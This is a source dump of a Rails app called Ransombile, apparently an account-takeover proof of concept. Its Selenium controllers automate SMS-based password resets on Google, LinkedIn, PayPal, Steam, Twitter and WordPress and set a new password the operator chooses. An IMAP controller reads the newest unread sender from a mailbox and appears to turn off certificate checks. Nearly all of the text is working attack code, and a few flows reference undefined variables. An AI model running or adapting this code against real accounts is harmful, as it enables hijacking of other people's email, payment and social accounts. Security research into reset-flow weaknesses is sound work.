} 25 | $selenium_driver.find_element(:id, "forgotPassword").send_keys :tab 26 | $selenium_driver.find_element(:id, "forgotPassword").send_keys :return 27 | end 28 | 29 | begin 30 | $selenium_driver.find_element(:id => "idvPreresteredPhoneSms").displayed? 31 | 32 | rescue Selenium::WebDriver::Error::NoSuchElementError => e 33 | begin 34 | wait.until { $selenium_driver.find_element(:id => "skipChallenge").displayed? } 35 | $selenium_driver.find_element(:id, "skipChallenge").click 36 | sleep 1 37 | $selenium_driver.find_element(:id => "idvPreresteredPhoneSms").displayed? 38 | rescue Selenium::WebDriver::Error::NoSuchElementError => e 39 | wait.until { $selenium_driver.find_element(:id => "skipChallenge").displayed? } 40 | $selenium_driver.find_element(:id, "skipChallenge").click 41 | sleep 1 42 | rescue Selenium::WebDriver::Error::TimeOutError => e # Handles Google's A/B testing 43 | wait.until { $selenium_driver.find_element(:xpath, "//span[text()='Try another way']").displayed? } 44 | $selenium_driver.find_element(:xpath, "//span[text()='Try another way']").click 45 | 46 | wait.until { $selenium_driver.find_element(:id, "phoneNumberId").displayed? } 47 | $selenium_driver.find_element(:id, "phoneNumberId").send_keys params[:phone] 48 | $selenium_driver.find_element(:id, "next").click 49 | end 50 | end 51 | 52 | wait.until { $selenium_driver.find_element(:id => "idvPreresteredPhoneSms").displayed? } 53 | $selenium_driver.find_element(:id, "idvPreresteredPhoneSms").click 54 | 55 | begin 56 | wait.until { $selenium_driver.find_element(:name => "phoneNumber").displayed? } 57 | $selenium_driver.find_element(:name, "phoneNumber").clear 58 | puts params[:phone] 59 | $selenium_driver.find_element(:name, "phoneNumber").send_keys params[:phone] 60 | puts params[:phone] 61 | rescue Selenium::WebDriver::Error::NoSuchElementError, Selenium::WebDriver::Error::TimeOutError=> e 62 | puts "A/B testing related error. All good!" 
63 | end 64 | 65 | render :json => {"website": "google", "status": "Waiting for temp code..."} 66 | rescue Exception => e 67 | puts e.to_s 68 | puts e.backtrace 69 | render :status => 500, :json => {"website": "google", "status": "Password reset failed!"} 70 | end 71 | end 72 | 73 | 74 | 75 | 76 | def finish 77 | begin 78 | wait = Selenium::WebDriver::Wait.new(:timeout => 5) 79 | begin 80 | wait.until { $selenium_driver.find_element(:id => "idvPreregisteredPhonePin").displayed? } 81 | $google_driver.find_element(:id, "idvPreregisteredPhonePin").clear 82 | $google_driver.find_element(:id, "idvPreregisteredPhonePin").send_keys params[:temp_code] 83 | $google_driver.find_element(:id, "submit").click 84 | rescue Selenium::WebDriver::Error::TimeOutError # Handles Google's A/B testing 85 | wait.until { $selenium_driver.find_element(:id, "idvPin").displayed? } 86 | $google_driver.find_element(:id, "idvPin").clear 87 | $google_driver.find_element(:id, "idvPin").send_keys params[:temp_code] 88 | $google_driver.find_element(:id, "idvPin").send_keys :return; 89 | end 90 | 91 | wait.until { $selenium_driver.find_element(:id => "Password").displayed? } 92 | $google_driver.find_element(:id, "Password").clear 93 | $google_driver.find_element(:id, "Password").send_keys params[:password] 94 | $google_driver.find_element(:id, "ConfirmPassword").clear 95 | $google_driver.find_element(:id, "ConfirmPassword").send_keys params[:password] 96 | $google_driver.find_element(:id, "submit").click 97 | 98 | begin 99 | wait = Selenium::WebDriver::Wait.new(:timeout => 1) 100 | wait.until { $google_driver.find_element(:id => "Password").displayed? 
} 101 | render :status => 500, :json => {"website": "google", "status": "Password reset failed!"} 102 | rescue Selenium::WebDriver::Error::TimeOutError => e 103 | render :json => {"website": "google", "status": "Password reset successful!"} 104 | end 105 | rescue Exception => e 106 | puts e.to_s 107 | puts e.backtrace 108 | render :status => 500, :json => {"website": "google", "status": "Password reset failed!"} 109 | end 110 | end 111 | 112 | 113 | 114 | end 115 | -------------------------------------------------------------------------------- /app/controllers/linkedin_controller.rb: -------------------------------------------------------------------------------- 1 | class LinkedinController < ApplicationController 2 | $selenium_driver = nil 3 | 4 | # To start the password reset process using the email 5 | def initiate 6 | begin 7 | $selenium_driver = Selenium::WebDriver.for :firefox 8 | base_url = "https://www.linkedin.com/uas/request-password-reset" 9 | $selenium_driver.get(base_url) 10 | wait = Selenium::WebDriver::Wait.new(:timeout => 5) 11 | 12 | begin # Handles A/B testing 13 | wait.until { $selenium_driver.find_element(:id => "username").displayed? } 14 | $selenium_driver.find_element(:id, "username").clear 15 | $selenium_driver.find_element(:id, "username").send_keys params[:email] 16 | $selenium_driver.find_element(:id, "reset-password-submit-button").click 17 | 18 | wait.until { $selenium_driver.find_element(:id => "sms").displayed? } 19 | $selenium_driver.find_element(:xpath, "//label[contains(@for,'sms')]").click 20 | $selenium_driver.find_element(:id, "reset-password-submit-button").click 21 | rescue Selenium::WebDriver::Error::TimeOutError => e 22 | wait.until { $selenium_driver.find_element(:id => "userName-requestPasswordReset").displayed? 
} 23 | $selenium_driver.find_element(:id, "userName-requestPasswordReset").clear 24 | $selenium_driver.find_element(:id, "userName-requestPasswordReset").send_keys params[:email] 25 | $selenium_driver.find_element(:id, "btnSubmitResetRequest").click 26 | 27 | wait.until { $selenium_driver.find_element(:id => "SMS-passwordResetOption-passwordResetOption").displayed? } 28 | $selenium_driver.find_element(:id, "SMS-passwordResetOption-passwordResetOption").click 29 | $selenium_driver.find_element(:id, "btn-submit").click 30 | end 31 | 32 | render :json => {"website": "linkedin", "status": "Waiting for temp code..."} # Replace WEBSITE with appropiate website name 33 | 34 | rescue Exception => e 35 | puts e.to_s 36 | puts e.backtrace 37 | render :status => 500, :json => {"website": "linkedin", "status": "Password reset failed!"} # Replace WEBSITE with appropiate website name 38 | end 39 | end 40 | 41 | 42 | 43 | # To handle the temp code input, set new password and finish the password reset process 44 | def finish 45 | begin 46 | wait = Selenium::WebDriver::Wait.new(:timeout => 5) 47 | begin # Handles A/B testing 48 | wait.until { $selenium_driver.find_element(:id => "newPassword").displayed? } 49 | $selenium_driver.find_element(:id, "newPassword").clear 50 | $selenium_driver.find_element(:id, "newPassword").send_keys params[:password] 51 | $selenium_driver.find_element(:id, "confirmPassword").clear 52 | $selenium_driver.find_element(:id, "confirmPassword").send_keys params[:password] 53 | $selenium_driver.find_element(:id, "reset-password-submit-button").click 54 | rescue Selenium::WebDriver::Error::TimeOutError => e 55 | wait.until { $selenium_driver.find_element(:id => "challenge-input").displayed? 
} 56 | $selenium_driver.find_element(:id, "challenge-input").clear 57 | $selenium_driver.find_element(:id, "challenge-input").send_keys params[:temp_code] 58 | 59 | wait = Selenium::WebDriver::Wait.new(:timeout => 5) 60 | wait.until { $selenium_driver.find_element(:css, "div.cp-challenge-actions.form-actions > input.btn-submit").displayed? } 61 | $selenium_driver.find_element(:css, "div.cp-challenge-actions.form-actions > input.btn-submit").click 62 | 63 | wait = Selenium::WebDriver::Wait.new(:timeout => 5) 64 | wait.until { $selenium_driver.find_element(:id => "new_password-newPassword-passwordReset").displayed? } 65 | $selenium_driver.find_element(:id, "new_password-newPassword-passwordReset").clear 66 | $selenium_driver.find_element(:id, "new_password-newPassword-passwordReset").send_keys params[:password] 67 | $selenium_driver.find_element(:id, "new_password_again-newPassword-passwordReset").clear 68 | $selenium_driver.find_element(:id, "new_password_again-newPassword-passwordReset").send_keys params[:password] 69 | $selenium_driver.find_element(:id, "reset").click 70 | end 71 | 72 | render :json => {"website": "linkedin", "status": "Password reset successful!"} # Replace WEBSITE with appropiate website name 73 | 74 | rescue Exception => e 75 | puts e.to_s 76 | puts e.backtrace 77 | render :status => 500, :json => {"website": "linkedin", "status": "Password reset failed!"} # Replace WEBSITE with appropiate website name 78 | end 79 | end 80 | 81 | 82 | end -------------------------------------------------------------------------------- /app/controllers/paypal_controller.rb: -------------------------------------------------------------------------------- 1 | class PaypalController < ApplicationController 2 | $selenium_driver = nil 3 | 4 | # To start the password reset process using the email 5 | def initiate 6 | begin 7 | $selenium_driver = Selenium::WebDriver.for :firefox 8 | base_url = "https://www.paypal.com/authflow/password-recovery/" 9 | 
$selenium_driver.get(base_url) 10 | 11 | wait = Selenium::WebDriver::Wait.new(:timeout => 5) 12 | wait.until { $selenium_driver.find_element(:name => "email").displayed? } 13 | wait.until { $selenium_driver.find_element(:name => "email").enabled? } 14 | $selenium_driver.find_element(:name, "email").click 15 | $selenium_driver.find_element(:name, "email").clear 16 | $selenium_driver.find_element(:name, "email").send_keys params[:email] 17 | 18 | $selenium_driver.find_element(:name, "submitForgotPasswordForm").click 19 | wait.until { $selenium_driver.find_element(:name => "submit").displayed? } 20 | wait.until { $selenium_driver.find_element(:id, "sms-challenge-option").displayed? } 21 | wait.until { $selenium_driver.find_element(:id, "sms-challenge-option").enabled? } 22 | $selenium_driver.find_element(:id, "sms-challenge-option").click 23 | $selenium_driver.find_element(:name, "submit").click 24 | 25 | render :json => {"website": "paypal", "status": "Waiting for temp code..."} # Replace WEBSITE with appropiate website name 26 | 27 | rescue Exception => e 28 | puts e.to_s 29 | puts e.backtrace 30 | render :status => 500, :json => {"website": "paypal", "status": "Password reset failed!"} # Replace WEBSITE with appropiate website name 31 | end 32 | end 33 | 34 | 35 | 36 | # To handle the temp code input, set new password and finish the password reset process 37 | def finish 38 | begin 39 | wait = Selenium::WebDriver::Wait.new(:timeout => 5) 40 | wait.until { $paypal_driver.find_element(:id => "smsAnswer").displayed? } 41 | $paypal_driver.find_element(:id, "smsAnswer").send_keys params[:temp_code] 42 | $paypal_driver.find_element(:name, "smsPin").click 43 | 44 | wait.until { $paypal_driver.find_element(:name => "password").displayed? 
} 45 | $paypal_driver.find_element(:name, "password").send_keys params[:password] 46 | $paypal_driver.find_element(:name, "confirmPassword").send_keys params[:password] 47 | 48 | wait.until { $paypal_driver.find_element(:name => "submitPassword").displayed? } 49 | wait.until { $paypal_driver.find_element(:name => "submitPassword").enabled? } 50 | $paypal_driver.find_element(:name, "submitPassword").click 51 | 52 | render :json => {"website": "paypal", "status": "Password reset successful!"} # Replace WEBSITE with appropiate website name 53 | 54 | rescue Exception => e 55 | puts e.to_s 56 | puts e.backtrace 57 | render :status => 500, :json => {"website": "paypal", "status": "Password reset failed!"} # Replace WEBSITE with appropiate website name 58 | end 59 | end 60 | 61 | 62 | end 63 |
--------------------------------------------------------------------------------
/app/controllers/ransombile_controller.rb:
--------------------------------------------------------------------------------
require 'net/imap'

# Controller with a single action, checkMail, that reads one mailbox over IMAP
# and reports the sender address of its newest unread message as JSON.
class RansombileController < ApplicationController

  # Mailbox credentials. They are process-wide globals, left empty in the
  # source, and are passed unchanged to imap.login below.
  $email = ""
  $password = ""

  # Renders {"email": <text between the angle brackets of the From header>}
  # for the last message id returned by an UNSEEN search of "Inbox".
  # Any exception on the way (no match, no message, login failure) renders
  # {"email": ""} instead; the cause is not logged.
  def checkMail
    begin
      # NOTE(review): legacy positional form (host, port, usessl, certs,
      # verify). The trailing false appears to switch off TLS certificate
      # verification, which would leave the login below open to interception
      # on the network path; confirm against the net-imap version in use.
      imap = Net::IMAP.new("imap.googlemail.com", 993, true, nil, false)
      imap.login($email, $password)
      # examine opens the mailbox read-only (IMAP EXAMINE).
      imap.examine("Inbox")
      emailIds = imap.search(["UNSEEN"])
      # emailIds.last is nil when the search returns nothing; the resulting
      # error is absorbed by the rescue below.
      emailData = imap.fetch(emailIds.last, "BODY[HEADER.FIELDS (FROM)]").first[1]["BODY[HEADER.FIELDS (FROM)]"].to_s
      # Greedy capture: takes everything between the first "<" and the last
      # ">" of the header text. match returns nil when there are no brackets,
      # and the [1] on the next line then raises into the rescue.
      regexResult = /<(.*)>/.match(emailData)
      emailFrom = regexResult[1]
      render :json => {"email": emailFrom}
    # NOTE(review): Exception is wider than StandardError, so this also
    # catches SystemExit and Interrupt; e is never used.
    rescue Exception => e
      render :json => {"email": ""}
    ensure
      # NOTE(review): imap is still nil here when Net::IMAP.new itself raised,
      # so this call raises NoMethodError after the rescue has rendered.
      imap.logout
    end
  end

end
--------------------------------------------------------------------------------
/app/controllers/steam_controller.rb:
--------------------------------------------------------------------------------
 1 | class SteamController < ApplicationController 2 | $selenium_driver = nil 3 | 4 | # To start the
password reset process using the email 5 | def initiate 6 | begin 7 | $selenium_driver = Selenium::WebDriver.for :firefox 8 | base_url = "https://help.steampowered.com/en/wizard/HelpWithLoginInfo" 9 | $selenium_driver.get(base_url) 10 | 11 | wait = Selenium::WebDriver::Wait.new(:timeout => 5) 12 | wait.until { $selenium_driver.find_element(:id, "forgot_login_search").displayed? } 13 | $selenium_driver.find_element(:id, "forgot_login_search").send_keys params[:email] 14 | $selenium_driver.find_element(:id, "forgot_login_search").send_keys :return 15 | 16 | # Needs testing from here on 17 | wait.until { $selenium_driver.find_element(:xpath, "//span[text()='Text an account verification']").displayed? } 18 | $selenium_driver.find_element(:xpath, "//span[text().='Text an account verification']").click 19 | 20 | render :json => {"website": "steam", "status": "Waiting for temp code..."} # Replace WEBSITE with appropiate website name 21 | 22 | rescue Exception => e 23 | puts e.to_s 24 | puts e.backtrace 25 | render :status => 500, :json => {"website": "steam", "status": "Password reset failed!"} # Replace WEBSITE with appropiate website name 26 | end 27 | end 28 | 29 | 30 | 31 | # To handle the temp code input, set new password and finish the password reset process 32 | def finish 33 | begin 34 | wait.until { $selenium_driver.find_element(:id => "forgot_login_code").displayed? 
} 35 | $selenium_driver.find_element(:id => "forgot_login_code").send_keys params[:temp_code] 36 | $selenium_driver.find_element(:id => "forgot_login_code").send_keys :return 37 | 38 | render :json => {"website": "steam", "status": "Password reset successful!"} # Replace WEBSITE with appropiate website name 39 | rescue Exception => e 40 | puts e.to_s 41 | puts e.backtrace 42 | render :status => 500, :json => {"website": "steam", "status": "Password reset failed!"} # Replace WEBSITE with appropiate website name 43 | end 44 | end 45 | end 46 | -------------------------------------------------------------------------------- /app/controllers/twitter_controller.rb: -------------------------------------------------------------------------------- 1 | class TwitterController < ApplicationController 2 | $selenium_driver = nil 3 | 4 | def initiate 5 | begin 6 | $selenium_driver = Selenium::WebDriver.for :firefox 7 | base_url = "https://twitter.com/account/begin_password_reset" 8 | $selenium_driver.get(base_url) 9 | 10 | wait = Selenium::WebDriver::Wait.new(:timeout => 5) 11 | wait.until { $selenium_driver.find_element(:name => "account_identifier").displayed? } 12 | $selenium_driver.find_element(:name, "account_identifier").clear 13 | $selenium_driver.find_element(:name, "account_identifier").send_keys params[:email] 14 | $selenium_driver.find_element(:css, "input.Button").click 15 | 16 | wait = Selenium::WebDriver::Wait.new(:timeout => 5) 17 | wait.until { $selenium_driver.find_element(:name => "method").displayed? 
} 18 | $selenium_driver.find_element(:name, "method").click 19 | $selenium_driver.find_element(:css, "input.Button").click 20 | 21 | render :json => {"website": "twitter", "status": "Waiting for temp code..."} 22 | rescue Exception => e 23 | puts e.to_s 24 | puts e.backtrace 25 | render :status => 500, :json => {"website": "twitter", "status": "Password reset failed!"} 26 | end 27 | end 28 | 29 | 30 | def finish 31 | begin 32 | $selenium_driver.find_element(:name, "pin").clear 33 | $selenium_driver.find_element(:name, "pin").send_keys params[:temp_code] 34 | $selenium_driver.find_element(:css, "input.Button").click 35 | 36 | wait = Selenium::WebDriver::Wait.new(:timeout => 5) 37 | wait.until { $selenium_driver.find_element(:id => "password").displayed? } 38 | $selenium_driver.find_element(:id, "password").clear 39 | $selenium_driver.find_element(:id, "password").send_keys params[:password] 40 | $selenium_driver.find_element(:name, "password_confirmation").clear 41 | $selenium_driver.find_element(:name, "password_confirmation").send_keys params[:password] 42 | $selenium_driver.find_element(:css, "input.Button").click 43 | 44 | render :json => {"website": "twitter", "status": "Password reset successful!"} 45 | rescue Exception => e 46 | puts e.to_s 47 | puts e.backtrace 48 | render :status => 500, :json => {"website": "twitter", "status": "Password reset failed!"} 49 | end 50 | end 51 | 52 | 53 | end 54 | -------------------------------------------------------------------------------- /app/controllers/website_template_controller.rb: -------------------------------------------------------------------------------- 1 | class WebsiteTemplateController < ApplicationController 2 | $selenium_driver = nil 3 | 4 | # To start the password reset process using the email 5 | def initiate 6 | begin 7 | $selenium_driver = Selenium::WebDriver.for :firefox 8 | 9 | # YOUR CODE 10 | 11 | render :json => {"website": "WEBSITE", "status": "Waiting for temp code..."} # Replace WEBSITE with 
appropiate website name 12 | 13 | rescue Exception => e 14 | puts e.to_s 15 | puts e.backtrace 16 | render :status => 500, :json => {"website": "WEBSITE", "status": "Password reset failed!"} # Replace WEBSITE with appropiate website name 17 | end 18 | end 19 | 20 | 21 | 22 | # To handle the temp code input, set new password and finish the password reset process 23 | def finish 24 | begin 25 | 26 | # YOUR CODE 27 | 28 | render :json => {"website": "WEBSITE", "status": "Password reset successful!"} # Replace WEBSITE with appropiate website name 29 | 30 | rescue Exception => e 31 | puts e.to_s 32 | puts e.backtrace 33 | render :status => 500, :json => {"website": "WEBSITE", "status": "Password reset failed!"} # Replace WEBSITE with appropiate website name 34 | end 35 | end 36 | 37 | 38 | end 39 | -------------------------------------------------------------------------------- /app/controllers/wordpress_controller.rb: -------------------------------------------------------------------------------- 1 | class WordpressController < ApplicationController 2 | $selenium_driver = nil 3 | 4 | # To start the password reset process using the email 5 | def initiate 6 | begin 7 | $selenium_driver = Selenium::WebDriver.for :firefox 8 | base_url = "https://wordpress.com/wp-login.php?action=lostpassword" 9 | $selenium_driver.get(base_url) 10 | 11 | wait = Selenium::WebDriver::Wait.new(:timeout => 5) 12 | wait.until { $selenium_driver.find_element(:id => "lostpasswordform").displayed? } 13 | wait.until { $selenium_driver.find_element(:id => "user_login").enabled? 
} 14 | $selenium_driver.find_element(:id, "user_login").clear 15 | $selenium_driver.find_element(:id, "user_login").send_keys params[:email] 16 | $selenium_driver.find_element(:id, "wp-submit").click 17 | 18 | render :json => {"website": "wordpress", "status": "Waiting for temp code..."} # Replace WEBSITE with appropiate website name 19 | 20 | rescue Exception => e 21 | puts e.to_s 22 | puts e.backtrace 23 | render :status => 500, :json => {"website": "wordpress", "status": "Password reset failed!"} # Replace WEBSITE with appropiate website name 24 | end 25 | end 26 | 27 | 28 | 29 | # To handle the temp code input, set new password and finish the password reset process 30 | def finish 31 | begin 32 | wait = Selenium::WebDriver::Wait.new(:timeout => 5) 33 | wait.until { $selenium_driver.find_element(:name => "recovery-sms").displayed? } 34 | $selenium_driver.find_element(:name, "recovery-sms").clear 35 | $selenium_driver.find_element(:name, "recovery-sms").send_keys params[:temp_code] 36 | $selenium_driver.find_element(:id, "wp-submit").click 37 | 38 | wait.until { $selenium_driver.find_element(:id => "pass1").displayed? } 39 | $selenium_driver.find_element(:id, "pass1").clear 40 | $selenium_driver.find_element(:id, "pass1").send_keys params[:password] 41 | wait.until { $selenium_driver.find_element(:name => "wp-submit").enabled? } 42 | $selenium_driver.find_element(:id, "wp-submit").click 43 | 44 | begin 45 | wait = Selenium::WebDriver::Wait.new(:timeout => 1) 46 | wait.until { $selenium_driver.find_element(:id => "login_error").displayed? 
} 47 | render :status => 500, :json => {"website": "wordpress", "status": "Password reset failed!"} 48 | rescue Selenium::WebDriver::Error::TimeOutError => e 49 | render :json => {"website": "wordpress", "status": "Password reset successful!"} 50 | end 51 | 52 | render :json => {"website": "wordpress", "status": "Password reset successful!"} # Replace WEBSITE with appropiate website name 53 | 54 | rescue Exception => e 55 | puts e.to_s 56 | puts e.backtrace 57 | render :status => 500, :json => {"website": "wordpress", "status": "Password reset failed!"} # Replace WEBSITE with appropiate website name 58 | end 59 | end 60 | 61 | end 62 | -------------------------------------------------------------------------------- /app/helpers/application_helper.rb: -------------------------------------------------------------------------------- 1 | module ApplicationHelper 2 | end 3 | -------------------------------------------------------------------------------- /app/helpers/ebay_helper.rb: -------------------------------------------------------------------------------- 1 | module EbayHelper 2 | end 3 | -------------------------------------------------------------------------------- /app/helpers/facebook_helper.rb: -------------------------------------------------------------------------------- 1 | module FacebookHelper 2 | end 3 | -------------------------------------------------------------------------------- /app/helpers/google_helper.rb: -------------------------------------------------------------------------------- 1 | module GoogleHelper 2 | end 3 | -------------------------------------------------------------------------------- /app/helpers/linkedin_helper.rb: -------------------------------------------------------------------------------- 1 | module LinkedinHelper 2 | end 3 | -------------------------------------------------------------------------------- /app/helpers/paypal_helper.rb: -------------------------------------------------------------------------------- 1 | 
module PaypalHelper 2 | end 3 | -------------------------------------------------------------------------------- /app/helpers/ransombile_helper.rb: -------------------------------------------------------------------------------- 1 | module RansombileHelper 2 | end 3 | -------------------------------------------------------------------------------- /app/helpers/steam_helper.rb: -------------------------------------------------------------------------------- 1 | module SteamHelper 2 | end 3 | -------------------------------------------------------------------------------- /app/helpers/twitter_helper.rb: -------------------------------------------------------------------------------- 1 | module TwitterHelper 2 | end 3 | -------------------------------------------------------------------------------- /app/helpers/website_template_helper.rb: -------------------------------------------------------------------------------- 1 | module WebsiteTemplateHelper 2 | end 3 | -------------------------------------------------------------------------------- /app/helpers/wordpress_helper.rb: -------------------------------------------------------------------------------- 1 | module WordpressHelper 2 | end 3 | -------------------------------------------------------------------------------- /app/jobs/application_job.rb: -------------------------------------------------------------------------------- 1 | class ApplicationJob < ActiveJob::Base 2 | end 3 | -------------------------------------------------------------------------------- /app/mailers/application_mailer.rb: -------------------------------------------------------------------------------- 1 | class ApplicationMailer < ActionMailer::Base 2 | default from: 'from@example.com' 3 | layout 'mailer' 4 | end 5 | -------------------------------------------------------------------------------- /app/models/application_record.rb: -------------------------------------------------------------------------------- 1 | class ApplicationRecord < 
ActiveRecord::Base 2 | self.abstract_class = true 3 | end 4 | -------------------------------------------------------------------------------- /app/models/concerns/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/martinvigo/ransombile/a02507c9a386d3e8df92c876876082edab52b800/app/models/concerns/.keep -------------------------------------------------------------------------------- /app/views/layouts/application.html.erb: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Ransombile 5 | <%= csrf_meta_tags %> 6 | 7 | <%= stylesheet_link_tag 'application', media: 'all', 'data-turbolinks-track': 'reload' %> 8 | <%= javascript_include_tag 'application', 'data-turbolinks-track': 'reload' %> 9 | 10 | 11 | 12 | <%= yield %> 13 | 14 | 15 | -------------------------------------------------------------------------------- /app/views/layouts/mailer.html.erb: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 8 | 9 | 10 | 11 | <%= yield %> 12 | 13 | 14 | -------------------------------------------------------------------------------- /app/views/layouts/mailer.text.erb: -------------------------------------------------------------------------------- 1 | <%= yield %> 2 | -------------------------------------------------------------------------------- /app/views/ransombile/index.html.erb: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | Ransombile 8 | 9 | 10 | 11 | 12 |
13 | Ransombile 14 | 15 |
16 |
17 | Password: 18 | 19 |
20 | 21 |
22 | Email: 23 | 24 |
25 | 26 | 27 |
28 | 29 | 30 |
31 | Google: 32 | 33 |
34 |
35 | 36 | 37 |
38 | 39 |
40 | Paypal: 41 | 42 |
43 |
44 | 45 | 46 |
47 | 48 |
49 | Facebook: 50 | 51 |
52 |
53 | 54 | 55 |
56 | 57 |
58 | Twitter: 59 | 60 |
61 |
62 | 63 | 64 |
65 | 66 |
67 | LinkedIn: 68 | 69 |
70 |
71 | 72 | 73 |
74 | 75 |
76 | Wordpress: 77 | 78 |
79 |
80 | 81 | 82 |
83 | 84 |
85 | Ebay: 86 | 87 |
88 |
89 | 90 | 91 |
92 |
93 | 94 | 95 | 96 | 213 | 214 | -------------------------------------------------------------------------------- /bin/bundle: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | ENV['BUNDLE_GEMFILE'] ||= File.expand_path('../../Gemfile', __FILE__) 3 | load Gem.bin_path('bundler', 'bundle') 4 | -------------------------------------------------------------------------------- /bin/rails: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | begin 3 | load File.expand_path('../spring', __FILE__) 4 | rescue LoadError => e 5 | raise unless e.message.include?('spring') 6 | end 7 | APP_PATH = File.expand_path('../config/application', __dir__) 8 | require_relative '../config/boot' 9 | require 'rails/commands' 10 | -------------------------------------------------------------------------------- /bin/rake: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | begin 3 | load File.expand_path('../spring', __FILE__) 4 | rescue LoadError => e 5 | raise unless e.message.include?('spring') 6 | end 7 | require_relative '../config/boot' 8 | require 'rake' 9 | Rake.application.run 10 | -------------------------------------------------------------------------------- /bin/setup: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | require 'pathname' 3 | require 'fileutils' 4 | include FileUtils 5 | 6 | # path to your application root. 7 | APP_ROOT = Pathname.new File.expand_path('../../', __FILE__) 8 | 9 | def system!(*args) 10 | system(*args) || abort("\n== Command #{args} failed ==") 11 | end 12 | 13 | chdir APP_ROOT do 14 | # This script is a starting point to setup your application. 15 | # Add necessary setup steps to this file. 16 | 17 | puts '== Installing dependencies ==' 18 | system! 
'gem install bundler --conservative' 19 | system('bundle check') || system!('bundle install') 20 | 21 | # puts "\n== Copying sample files ==" 22 | # unless File.exist?('config/database.yml') 23 | # cp 'config/database.yml.sample', 'config/database.yml' 24 | # end 25 | 26 | puts "\n== Preparing database ==" 27 | system! 'bin/rails db:setup' 28 | 29 | puts "\n== Removing old logs and tempfiles ==" 30 | system! 'bin/rails log:clear tmp:clear' 31 | 32 | puts "\n== Restarting application server ==" 33 | system! 'bin/rails restart' 34 | end 35 | -------------------------------------------------------------------------------- /bin/spring: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | # This file loads spring without using Bundler, in order to be fast. 4 | # It gets overwritten when you run the `spring binstub` command. 5 | 6 | unless defined?(Spring) 7 | require 'rubygems' 8 | require 'bundler' 9 | 10 | lockfile = Bundler::LockfileParser.new(Bundler.default_lockfile.read) 11 | spring = lockfile.specs.detect { |spec| spec.name == "spring" } 12 | if spring 13 | Gem.use_paths Gem.dir, Bundler.bundle_path.to_s, *Gem.path 14 | gem 'spring', spring.version 15 | require 'spring/binstub' 16 | end 17 | end 18 | -------------------------------------------------------------------------------- /bin/update: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | require 'pathname' 3 | require 'fileutils' 4 | include FileUtils 5 | 6 | # path to your application root. 7 | APP_ROOT = Pathname.new File.expand_path('../../', __FILE__) 8 | 9 | def system!(*args) 10 | system(*args) || abort("\n== Command #{args} failed ==") 11 | end 12 | 13 | chdir APP_ROOT do 14 | # This script is a way to update your development environment automatically. 15 | # Add necessary update steps to this file. 16 | 17 | puts '== Installing dependencies ==' 18 | system! 
'gem install bundler --conservative' 19 | system('bundle check') || system!('bundle install') 20 | 21 | puts "\n== Updating database ==" 22 | system! 'bin/rails db:migrate' 23 | 24 | puts "\n== Removing old logs and tempfiles ==" 25 | system! 'bin/rails log:clear tmp:clear' 26 | 27 | puts "\n== Restarting application server ==" 28 | system! 'bin/rails restart' 29 | end 30 | -------------------------------------------------------------------------------- /config.ru: -------------------------------------------------------------------------------- 1 | # This file is used by Rack-based servers to start the application. 2 | 3 | require_relative 'config/environment' 4 | 5 | run Rails.application 6 | -------------------------------------------------------------------------------- /config/application.rb: -------------------------------------------------------------------------------- 1 | require_relative 'boot' 2 | 3 | require 'rails/all' 4 | 5 | # Require the gems listed in Gemfile, including any gems 6 | # you've limited to :test, :development, or :production. 7 | Bundler.require(*Rails.groups) 8 | 9 | module Ransombile 10 | class Application < Rails::Application 11 | # Settings in config/environments/* take precedence over those specified here. 12 | # Application configuration should go into files in config/initializers 13 | # -- all .rb files in that directory are automatically loaded. 14 | end 15 | end 16 | -------------------------------------------------------------------------------- /config/boot.rb: -------------------------------------------------------------------------------- 1 | ENV['BUNDLE_GEMFILE'] ||= File.expand_path('../Gemfile', __dir__) 2 | 3 | require 'bundler/setup' # Set up gems listed in the Gemfile. 
4 | -------------------------------------------------------------------------------- /config/cable.yml: -------------------------------------------------------------------------------- 1 | development: 2 | adapter: async 3 | 4 | test: 5 | adapter: async 6 | 7 | production: 8 | adapter: redis 9 | url: redis://localhost:6379/1 10 | -------------------------------------------------------------------------------- /config/database.yml: -------------------------------------------------------------------------------- 1 | # SQLite version 3.x 2 | # gem install sqlite3 3 | # 4 | # Ensure the SQLite 3 gem is defined in your Gemfile 5 | # gem 'sqlite3' 6 | # 7 | default: &default 8 | adapter: sqlite3 9 | pool: 5 10 | timeout: 5000 11 | 12 | development: 13 | <<: *default 14 | database: db/development.sqlite3 15 | 16 | # Warning: The database defined as "test" will be erased and 17 | # re-generated from your development database when you run "rake". 18 | # Do not set this db to the same as development or production. 19 | test: 20 | <<: *default 21 | database: db/test.sqlite3 22 | 23 | production: 24 | <<: *default 25 | database: db/production.sqlite3 26 | -------------------------------------------------------------------------------- /config/environment.rb: -------------------------------------------------------------------------------- 1 | # Load the Rails application. 2 | require_relative 'application' 3 | 4 | # Initialize the Rails application. 5 | Rails.application.initialize! 6 | -------------------------------------------------------------------------------- /config/environments/development.rb: -------------------------------------------------------------------------------- 1 | Rails.application.configure do 2 | # Settings specified here will take precedence over those in config/application.rb. 3 | 4 | # In the development environment your application's code is reloaded on 5 | # every request. 
